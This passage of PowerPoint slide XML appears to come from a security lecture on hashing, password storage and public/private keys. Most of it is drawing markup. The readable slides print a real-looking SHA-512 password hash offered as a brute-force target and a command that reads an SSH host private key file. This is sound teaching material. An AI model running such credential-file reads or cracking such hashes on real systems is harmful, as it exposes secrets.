                <a:ext cx="2610360" cy="15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AC5A1F08-EEC1-D84F-B3A0-23ED2E5BE1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2192073" y="6083032"/>
            <a:ext cx="821520" cy="527040"/>
            <a:chOff x="2192073" y="6083032"/>
            <a:chExt cx="821520" cy="52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D1EB79E-8FD8-A741-995A-70FE129BEF53}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2192073" y="6274912"/>
                <a:ext cx="488160" cy="335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D1EB79E-8FD8-A741-995A-70FE129BEF5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83433" y="6265912"/>
                  <a:ext cx="50580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30E6F89-0C8F-7841-B26E-9AFC75E332AA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2422473" y="6113992"/>
                <a:ext cx="282240" cy="187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30E6F89-0C8F-7841-B26E-9AFC75E332A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13833" y="6104992"/>
                  <a:ext cx="2998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1C6C07A-F263-0249-81A7-1D68ABED0C99}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2766633" y="6083032"/>
                <a:ext cx="246960" cy="189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1C6C07A-F263-0249-81A7-1D68ABED0C9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57633" y="6074032"/>
                  <a:ext cx="264600" cy="20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368A759-3AE0-8844-9381-0657B7F6153F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7699713" y="5870632"/>
              <a:ext cx="43488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368A759-3AE0-8844-9381-0657B7F6153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90713" y="5861632"/>
                <a:ext cx="45252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C8EA1-1AB9-5C4A-AE70-A0F1C28D2EAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7655793" y="6098152"/>
            <a:ext cx="454680" cy="362880"/>
            <a:chOff x="7655793" y="6098152"/>
            <a:chExt cx="454680" cy="36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1B284B8-FC58-7B4A-AA87-D10BC14687CB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7655793" y="6229552"/>
                <a:ext cx="209880" cy="231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1B284B8-FC58-7B4A-AA87-D10BC14687C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647153" y="6220552"/>
                  <a:ext cx="2275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48D52A-9781-5D4F-8ED9-04AD2DEF3606}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7914633" y="6124072"/>
                <a:ext cx="75240" cy="137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48D52A-9781-5D4F-8ED9-04AD2DEF360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05633" y="6115432"/>
                  <a:ext cx="928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5970B30-4E9F-D742-B5C4-D54FD763F921}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8034873" y="6111472"/>
                <a:ext cx="75600" cy="70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5970B30-4E9F-D742-B5C4-D54FD763F92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025873" y="6102472"/>
                  <a:ext cx="932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6600003-7758-094C-AEE2-FE49C8BED54E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8102193" y="6098152"/>
                <a:ext cx="360" cy="185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6600003-7758-094C-AEE2-FE49C8BED54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93553" y="6089512"/>
                  <a:ext cx="18000" cy="20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24D82D4-B141-C949-A561-2F6F11536843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="375153" y="6073312"/>
            <a:ext cx="599400" cy="614880"/>
            <a:chOff x="375153" y="6073312"/>
            <a:chExt cx="599400" cy="61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6702360-D567-084F-8604-E544D4E96126}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="375153" y="6247192"/>
                <a:ext cx="442080" cy="441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6702360-D567-084F-8604-E544D4E9612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6513" y="6238192"/>
                  <a:ext cx="45972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43FDC9D-636F-AC47-B9C2-C3616D81484D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="664593" y="6124072"/>
                <a:ext cx="195480" cy="150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43FDC9D-636F-AC47-B9C2-C3616D81484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5953" y="6115072"/>
                  <a:ext cx="2131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32C600E-262D-3442-939B-E76AD312B627}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="843873" y="6082312"/>
                <a:ext cx="130680" cy="114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32C600E-262D-3442-939B-E76AD312B62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34873" y="6073312"/>
                  <a:ext cx="1483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4A65CD8-2277-6448-803A-BFB60066BD53}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="919473" y="6073312"/>
                <a:ext cx="360" cy="177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4A65CD8-2277-6448-803A-BFB60066BD5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10833" y="6064312"/>
                  <a:ext cx="18000" cy="195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4704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BEED-7AB7-1444-AFC4-1C4157D9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Sayler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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E2EB-E047-D34E-A20C-A716A63C7A5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6397752" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Former PhD student and all around great guy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t invite him to give a talk though</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Andy said</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“I just check the first few and last few hex digits to ensure two hashes are the same”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A “sayler-6” collision is a pair of distinct inputs that match in (at least) the first 6 and last 6 hex digits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C07050-6F39-4E4B-A401-D3F9661D3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930" y="0"/>
            <a:ext cx="2323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34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Due to (assumed) one-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wayness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we can use to hash passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My SHA-512 hashed password on kali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$6$QPCTJ5IJ$MHIZvLuQ00i4QIO.bXxSo4ekRR1W6x87myYOAuW.ZbSatAvZFrQjzc4uexj0z4Z430yROm.1b5ymyU778hyqJ0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telling you this allows you try and brute-force it, but not reverse it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note, in this case, the hash function has increased the size of a string (my password is not 96 chars long)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C8F660-64C7-5D4E-A5E3-811F48738308}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1327713" y="3407872"/>
              <a:ext cx="624600" cy="20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C8F660-64C7-5D4E-A5E3-811F487383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8713" y="3398872"/>
                <a:ext cx="64224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ABA4E96-361B-CC4A-85CC-75C4F414792A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1920633" y="2997832"/>
              <a:ext cx="1192320" cy="39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ABA4E96-361B-CC4A-85CC-75C4F41479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11633" y="2989192"/>
                <a:ext cx="120996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67602CD-875C-F64F-9E38-E3554D6C21D3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="589353" y="2591752"/>
              <a:ext cx="852480" cy="1536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67602CD-875C-F64F-9E38-E3554D6C21D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0713" y="2583112"/>
                <a:ext cx="870120" cy="1554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Psst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>, Buddy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> see my Private Key?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cat /etc/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ssh_host_rsa_key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Public key is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/etc/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/ssh_host_rsa_key.pub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Private key is bigger because it has some decryption hints to make it faster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> protection on these files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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09DA01-83A0-344E-88BA-7327E1CC3AFD}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3555033" y="2106472"/>
              <a:ext cx="2930040" cy="120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09DA01-83A0-344E-88BA-7327E1CC3A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6393" y="2097832"/>
                <a:ext cx="2947680" cy="138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CB8E7-1A8C-004D-90EE-9B9AF11F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521AD3-8460-9445-96B5-CB6D0183083D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1524993" y="1756192"/>
              <a:ext cx="3403440" cy="4232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521AD3-8460-9445-96B5-CB6D018308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5993" y="1747552"/>
                <a:ext cx="3421080" cy="425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1F032013-507F-E94D-B75F-73A82DCD862C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1599873" y="2442712"/>
            <a:ext cx="3075480" cy="633960"/>
            <a:chOff x="1599873" y="2442712"/>
            <a:chExt cx="3075480" cy="63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2D276D6-F584-E840-94F3-4B66B7FD8FD7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1599873" y="3026992"/>
                <a:ext cx="3075480" cy="49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2D276D6-F584-E840-94F3-4B66B7FD8FD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91233" y="3017992"/>
                  <a:ext cx="30931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893A7AA-A2A1-5D49-B09A-B3333E2180DB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2318073" y="2481232"/>
                <a:ext cx="360" cy="343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893A7AA-A2A1-5D49-B09A-B3333E2180D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09073" y="2472232"/>
                  <a:ext cx="1800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1DD43A4-8EA5-9A4B-BFF0-A111B024CCC4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2160753" y="2631712"/>
                <a:ext cx="341280" cy="50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1DD43A4-8EA5-9A4B-BFF0-A111B024CC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51753" y="2623072"/>
                  <a:ext cx="3589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608CDF2-D1EB-2E49-A1F0-AA7B3C017670}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2457393" y="2665912"/>
                <a:ext cx="221040" cy="232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608CDF2-D1EB-2E49-A1F0-AA7B3C01767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48753" y="2657272"/>
                  <a:ext cx="2386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5019B29-9472-9145-8190-875F3947116A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2757993" y="2675272"/>
                <a:ext cx="193320" cy="115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5019B29-9472-9145-8190-875F3947116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48993" y="2666632"/>
                  <a:ext cx="2109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DAD7707-7756-1E48-8DAD-C1DC0E8506DD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2782113" y="2588512"/>
                <a:ext cx="117720" cy="276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DAD7707-7756-1E48-8DAD-C1DC0E8506D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73473" y="2579872"/>
                  <a:ext cx="1353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9E17670-C7DA-0146-BA0C-AADAB70D6E04}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3052113" y="2442712"/>
                <a:ext cx="158400" cy="288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9E17670-C7DA-0146-BA0C-AADAB70D6E0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43113" y="2434072"/>
                  <a:ext cx="1760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8DA62A4-214C-A846-AB28-350BAC4B2648}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2926473" y="2588512"/>
                <a:ext cx="242280" cy="24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8DA62A4-214C-A846-AB28-350BAC4B264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17833" y="2579512"/>
                  <a:ext cx="259920" cy="4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519D3F4-4C87-1846-89DD-06D3A44F3791}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4914393" y="2209792"/>
              <a:ext cx="129240" cy="2588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519D3F4-4C87-1846-89DD-06D3A44F379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05393" y="2201152"/>
                <a:ext cx="14688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D546C3E-0AD4-4948-A0EF-C1CCBB61C38E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4861833" y="2265232"/>
              <a:ext cx="69840" cy="734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D546C3E-0AD4-4948-A0EF-C1CCBB61C38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53193" y="2256232"/>
                <a:ext cx="8748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AB426B9-4F5E-674E-91C2-14BC122FC93B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5268993" y="2199712"/>
              <a:ext cx="293400" cy="185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AB426B9-4F5E-674E-91C2-14BC122FC93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60353" y="2190712"/>
                <a:ext cx="31104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96D5796-6A56-5342-A565-2B47B2EFF411}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5313273" y="2143192"/>
              <a:ext cx="160560" cy="3283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96D5796-6A56-5342-A565-2B47B2EFF41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04273" y="2134192"/>
                <a:ext cx="17820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2FF1BBB-64CE-154E-8F9E-851BE93B4043}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1851873" y="3867592"/>
              <a:ext cx="2892600" cy="90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2FF1BBB-64CE-154E-8F9E-851BE93B404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42873" y="3858952"/>
                <a:ext cx="29102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E4B7AF91-32E4-4E41-A03A-1FC55C6694E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5041113" y="3308152"/>
            <a:ext cx="701280" cy="361800"/>
            <a:chOff x="5041113" y="3308152"/>
            <a:chExt cx="701280" cy="36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814D664-0144-B949-893F-1386D1EF4D3B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5041113" y="3410752"/>
                <a:ext cx="173520" cy="259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814D664-0144-B949-893F-1386D1EF4D3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32473" y="3402112"/>
                  <a:ext cx="1911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E708C34-7D0F-9A4D-8BCF-10B7CF5B6D79}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5412633" y="3308152"/>
                <a:ext cx="329760" cy="277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E708C34-7D0F-9A4D-8BCF-10B7CF5B6D7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03633" y="3299512"/>
                  <a:ext cx="347400" cy="29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8F19574-CE1D-274D-A6A7-711FE55AC86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2049873" y="4125352"/>
            <a:ext cx="2775600" cy="598680"/>
            <a:chOff x="2049873" y="4125352"/>
            <a:chExt cx="2775600" cy="59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6F1EBD5-C854-4745-A902-71A171F3B061}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2049873" y="4500472"/>
                <a:ext cx="2775600" cy="15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6F1EBD5-C854-4745-A902-71A171F3B06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41233" y="4491832"/>
                  <a:ext cx="2793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D9E2DF7-E2CE-284B-8E35-FD2ED0D592B1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2527953" y="4125352"/>
                <a:ext cx="331920" cy="342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D9E2DF7-E2CE-284B-8E35-FD2ED0D592B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18953" y="4116352"/>
                  <a:ext cx="3495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83024E7-AEC6-AA40-BBEC-67A219E8C7A3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2813073" y="4294912"/>
                <a:ext cx="422640" cy="195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83024E7-AEC6-AA40-BBEC-67A219E8C7A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04073" y="4286272"/>
                  <a:ext cx="4402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2A85D4B-5AF9-5944-B6E2-EDF3B61882D5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3235353" y="4294912"/>
                <a:ext cx="32400" cy="379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2A85D4B-5AF9-5944-B6E2-EDF3B61882D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26353" y="4286272"/>
                  <a:ext cx="5004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BADAEDE-691B-734F-A146-F51ED22347C4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3222753" y="4257832"/>
                <a:ext cx="193680" cy="268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BADAEDE-691B-734F-A146-F51ED22347C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14113" y="4248832"/>
                  <a:ext cx="2113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79058A5-4934-1549-9290-1A5CDDD6D264}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3576273" y="4311112"/>
                <a:ext cx="16200" cy="397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79058A5-4934-1549-9290-1A5CDDD6D26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67273" y="4302112"/>
                  <a:ext cx="3384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7C40AE3-2CF9-824A-AED2-A9C36C5830AD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3465393" y="4452592"/>
                <a:ext cx="299520" cy="271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7C40AE3-2CF9-824A-AED2-A9C36C5830A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56753" y="4443952"/>
                  <a:ext cx="317160" cy="28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191DB15-198F-FC4B-BD96-AB1CA05F07D6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2226273" y="5370952"/>
              <a:ext cx="2726640" cy="2318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191DB15-198F-FC4B-BD96-AB1CA05F07D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217273" y="5361952"/>
                <a:ext cx="2744280" cy="24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4BFA254D-63F5-E44F-8233-DD2DC58942B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2846193" y="5050192"/>
            <a:ext cx="1476360" cy="930600"/>
            <a:chOff x="2846193" y="5050192"/>
            <a:chExt cx="1476360" cy="93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2E888EB-6999-9D40-B4A9-B44465F2D77D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2846193" y="5667592"/>
                <a:ext cx="276120" cy="3132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2E888EB-6999-9D40-B4A9-B44465F2D77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37193" y="5658952"/>
                  <a:ext cx="29376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5999799-F66F-9B46-8991-04444A0962D2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3211233" y="5634112"/>
                <a:ext cx="360" cy="235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5999799-F66F-9B46-8991-04444A0962D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202593" y="5625472"/>
                  <a:ext cx="180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30B90A5-1E6C-5646-84DC-0C86804E88DE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3126273" y="5701432"/>
                <a:ext cx="272520" cy="77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30B90A5-1E6C-5646-84DC-0C86804E88D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17633" y="5692432"/>
                  <a:ext cx="2901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AF2324D-8EB0-E745-B360-56F9BB47F2B1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3357033" y="5750392"/>
                <a:ext cx="271800" cy="158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AF2324D-8EB0-E745-B360-56F9BB47F2B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48033" y="5741392"/>
                  <a:ext cx="2894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6719740-A71F-A741-B717-FAB373D4AE89}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3632433" y="5725192"/>
                <a:ext cx="190800" cy="161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6719740-A71F-A741-B717-FAB373D4AE8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623793" y="5716192"/>
                  <a:ext cx="2084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F39DD0B-C40E-C74E-90ED-B4F7EA17ABEB}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3886953" y="5616472"/>
                <a:ext cx="360" cy="1929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F39DD0B-C40E-C74E-90ED-B4F7EA17ABE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77953" y="5607832"/>
                  <a:ext cx="180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B1A6F4E-DD4B-B044-AD27-E6EAD0142A40}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3876873" y="5645992"/>
                <a:ext cx="164160" cy="2365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B1A6F4E-DD4B-B044-AD27-E6EAD0142A4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68233" y="5636992"/>
                  <a:ext cx="1818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6E905AF-B51B-AE43-ACAB-8371605EB08D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4172433" y="5292472"/>
                <a:ext cx="40680" cy="4719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6E905AF-B51B-AE43-ACAB-8371605EB08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163793" y="5283472"/>
                  <a:ext cx="5832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C61916E-F99C-4E4E-9D3B-84D055C33829}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4112673" y="5050192"/>
                <a:ext cx="209880" cy="269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C61916E-F99C-4E4E-9D3B-84D055C3382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103673" y="5041552"/>
                  <a:ext cx="227520" cy="28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CC68039-E1F5-434B-833F-EF4E44F884D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5252073" y="5336392"/>
            <a:ext cx="414360" cy="285840"/>
            <a:chOff x="5252073" y="5336392"/>
            <a:chExt cx="414360" cy="28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433E84B-5FB3-2948-83BE-78E11A358203}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5252073" y="5336392"/>
                <a:ext cx="142200" cy="2858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433E84B-5FB3-2948-83BE-78E11A35820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43433" y="5327392"/>
                  <a:ext cx="1598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71DCEA5-8F16-0844-8631-91A92F408607}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5409393" y="5351872"/>
                <a:ext cx="257040" cy="243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71DCEA5-8F16-0844-8631-91A92F40860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00753" y="5343232"/>
                  <a:ext cx="274680" cy="26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A4978FD-051F-0E45-8485-47A01D15F4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5158473" y="3973792"/>
            <a:ext cx="378000" cy="333000"/>
            <a:chOff x="5158473" y="3973792"/>
            <a:chExt cx="378000" cy="33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A12B431-8AC5-2442-BA0A-D0B0FC0F3748}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5158473" y="4014832"/>
                <a:ext cx="124920" cy="2919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A12B431-8AC5-2442-BA0A-D0B0FC0F374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49473" y="4006192"/>
                  <a:ext cx="14256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41835E0-9215-FE49-AAD9-9234FA9E2F4A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5294553" y="3973792"/>
                <a:ext cx="241920" cy="260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41835E0-9215-FE49-AAD9-9234FA9E2F4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285913" y="3965152"/>
                  <a:ext cx="259560" cy="27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8ACFED3-8A48-9543-BE7B-F66564362899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2213673" y="3283672"/>
            <a:ext cx="2097000" cy="559440"/>
            <a:chOff x="2213673" y="3283672"/>
            <a:chExt cx="2097000" cy="55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0594AD9-1672-A448-B036-5AB991669820}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2213673" y="3283672"/>
                <a:ext cx="364320" cy="559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0594AD9-1672-A448-B036-5AB99166982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205033" y="3274672"/>
                  <a:ext cx="38196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F779845-81FD-104A-AC29-206E73F13A20}"/>
                    </a:ext>
                  </a:extLst>
